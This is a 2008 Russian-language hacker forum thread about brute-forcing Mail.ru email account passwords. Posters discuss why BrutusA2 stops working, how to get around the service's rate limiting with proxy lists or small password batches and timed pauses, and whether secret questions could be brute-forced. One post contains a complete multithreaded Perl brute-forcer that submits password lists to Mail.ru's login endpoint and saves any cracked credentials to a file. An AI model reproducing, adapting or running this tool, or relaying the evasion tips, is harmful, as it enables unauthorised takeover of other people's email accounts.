Просмотр полной версии : BrutusA2: проблема c Mail.ru
ArmageddonPro
06.01.2008, 22:14
Периодически проверяю работспособность данного брута с Mail.ru.
Сегодня решил попробовать сбрутить собственную почту: взял брут, взял словарик с примерно 200(две сотни) паролями, один из которых правильный. После прогона по словарю мыло не сбрутилось, повторял несколько раз и ни разу пасс не был подобран. На ачате не встречал данной проблемы, хотя не исключаю, что уже обсуждалось, и тем не менее решил спросить. Кто, что скажет по этому поводу?
ЗЫ: только что проверил работоспособность брута на примере _www.hotbox.ru всё работает, мыло сдалось.
ArmageddonPro
06.01.2008, 22:34
Раз уж создал тему про брут - продолжу.
А возможно брутить не мыло, а его секретный вопрос? Дело в том, что заранее там уже предлагается указать номер паспорта, например, а это всего лишь прогон по 900 тыс. паролям- это не так много. Или, например, по девичьей фамилии матери, там тоже не так много должно быть, да и все эти варианты заранее сокращают громадный словарь. Минус только один - пасс сменится на почте.
ArmageddonPro
06.01.2008, 22:41
там каптча
Что это? немного подробнее, если можно. Брут теперь с майлом не будет работать? До НГ точно работал.
ну на секретном вопросе стоит такая хрень, что нада вписовать цифры с картинки
qPhoenix
07.01.2008, 13:40
На мейл.ру защита от брута, при чем идея улыбнула - когда брутиш с одного ИП не важно, через РОР3 или ХТТП после ЭН-ного кол-ва переборов (либо времени) - на любой пасс кричит - не верный =)
(через время расчехляется, потом снова гонит, закономерности так и не выкупил)
Для проверки во время брута вручную пытался зайти под своим рабочим мылом через Веб интерфейс и через РОР3 - тупо настаивало что пасс не верный )
ArmageddonPro
07.01.2008, 13:45
На мейл.ру защита от брута, при чем идея улыбнула - когда брутиш с одного ИП не важно, через РОР3 или ХТТП после ЭН-ного кол-ва переборов (либо времени) - на любой пасс кричит - не верный =)
(через время расчехляется, потом снова гонит, закономерности так и не выкупил)
Для проверки во время брута вручную пытался зайти под своим рабочим мылом через Веб интерфейс и через РОР3 - тупо настаивало что пасс не верный )
Теперь только через проксю?
qPhoenix
07.01.2008, 13:48
Походу да (только не одну а хотяб 100).. Сам практикую Брут + Proxyfier
Но это тупо ананизьм..
kung lao
27.01.2008, 22:45
выявил некую закономерность при бруте мэйлару, в словаре не должно быть более 15 слов(примерно), после переборки каждого из словарей(состоящих из 15 слов) надо ждать 20 минут, потом опять пробовать новую порцию(в 15 слов) паролей.... если же взять словарь на 200 слов, то правильный пароль не видит... независимо от перерыва во времени....
итог: для положительного резалта надо - словари - 15 слов, 15 минут отдых... вот такой вот гемор
ArmageddonPro
27.01.2008, 23:38
выявил некую закономерность при бруте мэйлару, в словаре не должно быть более 15 слов(примерно), после переборки каждого из словарей(состоящих из 15 слов) надо ждать 20 минут, потом опять пробовать новую порцию(в 15 слов) паролей.... если же взять словарь на 200 слов, то правильный пароль не видит... независимо от перерыва во времени....
итог: для положительного резалта надо - словари - 15 слов, 15 минут отдых... вот такой вот гемор
Забить на такой брут, легче вручную вводить
#!/usr/bin/perl
use LWP::UserAgent;
use threads;
use threads::shared;
my $num : shared;
my $dyndyk : shared;
my $thepass : shared;
print "\a\a\a\a########## GeNoM-- mail.ru bruter v 3.0 || http://www.genom.h10.ru ###############\n";
my $ua = LWP::UserAgent->new(
max_size => 1024,
agent => 'kakep brayzer v 9.1.1',
timeout => 30,
);
# $proxy='127.0.0.1:8080';
# $ua->proxy('http'=>"http://$proxy"); # вот ваша прокся запишите тип http или socks и адрес можете в переменную можете просто так
$threads=4; # количество потоков
$tclover=40; # количество пасов отбручиваемых потоком
$time=localtime;
print "Start brute in $time\n";
open(pass,"<pass.txt");
while($sykaz=<pass>){$what_pass++;}
close(pass);
open(mails,"<mail.txt");
while($sykaz=<mails>){$what_mail++;}
close(mails);
print"\n~~~~~ total mails:$what_mail and password:$what_pass ~~~~~\n\n";
open(mails,"<mail.txt");
while ($mails=<mails>) {
open(pass,"<pass.txt");
print"Start brute mail->$mails\n";
$mails=~s/\n//;
($login,$domain)=split(/\@/,$mails);
# threads->create(\&loginbr); # вот перебор по логин+цифра если он нужен уберите решетку
puk:
# считываем пасы в массив для последующего скармливания их потоку
for ($i = 0; $i < $tclover; $i++) {
$password=<pass>;
$password=~s/\n//;
@passwd[$i]=$password;
}
open logg,">>log.txt";print logg "\n\nStart new thread with mail->$mails and password->@passwd[0]\n";close logg;
threads->create(\&brut,@passwd);
$num++;
$got=$got+$tclover;
$progr=int(($got/$what_pass)*100);
print"\nStart new thread with mail->$mails & password->@passwd[0] & bruted password->$got & progress->$progr%\n";
sleep(1);
if($got >= $what_pass){print"\n\nEnd of password list ....\n\n";goto(konec);}
if($dyndyk==55){print"\n\n\a\a\a####### BRUTE PASSWORD [OK].... see brute_mail.txt #######\n\n";goto(konec);}
check:
if($num < $threads){goto(puk)}
else{sleep(1);goto(check);};
konec:
$got=0;
foreach(threads->list) { $_->join } # ждем оконания остальных потоков и идем дальше
close(pass);
$dyndyk=0;
}
close(mails);
sub brut {
foreach $pyss(@_){
if($dyndyk==55){goto(proskok);}
my $req = HTTP::Request->new(POST => 'http://win.mail.ru/cgi-bin/auth');
$req->content("page=&post=&login_from=http://mail.ru/&Login=$login&Domain=$domain&Password=$pyss");
$req->referer('http://win.mail.ru/cgi-bin/auth');
my $res = $ua->request($req);
if($res->content=~/500 Can't connect/i) {print "Bad connect.......\n";exit;}
if($res->content=~/checkcookie/i) {$dyndyk=55; print "\a\a\aFor $login\@$domain password->$pyss\n";
open brut, ">>brute-mail.txt";print brut "$login\@$domain password->$pyss\n";close brut;
open logg,">>log.txt";print logg "For $login\@$domain password->$pyss\n";close logg;}
proskok:
}
$num--;
}
sub loginbr {
print"Start simple brute login->$login\n\n";
for($tt=0;$tt<=99;$tt++){
my $req = HTTP::Request->new(POST => 'http://win.mail.ru/cgi-bin/auth');
$req->content("page=&post=&login_from=http://mail.ru/&Login=$login&Domain=$domain&Password=$login$tt");
$req->referer('http://win.mail.ru/cgi-bin/auth');
my $res = $ua->request($req);
if($res->content=~/500 Can't connect/i) {print "$yda4a\n";exit;}
if($res->content=~/checkcookie/i) {$dyndyk=55; print "For $login\@$domain password->$login$tt\n";
open brut, ">>brute-mail.txt";print brut "$login\@$domain password->$login$tt\n";close brut;
open logg,">>log.txt";print logg "For $login\@$domain password->$login$tt\n";close logg;goto(pyps);
}
pyps:
}
}
вот этим раньше пользовался для брута, актуаленли он щас не знаю...
Black dead
28.01.2008, 13:20
SchmeL тоже самое будет , что и с AET2 бан IP на некоторое время
SchmeL тоже самое будет , что и с AET2 бан IP на некоторое время
можно в принципе сделать proxy-list, но тож не вариант если каждый прокс будут блокировать на n минут...
Chrek625
11.02.2008, 15:35
ТАк как же теперь взламывать ящики на mail.ru????
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot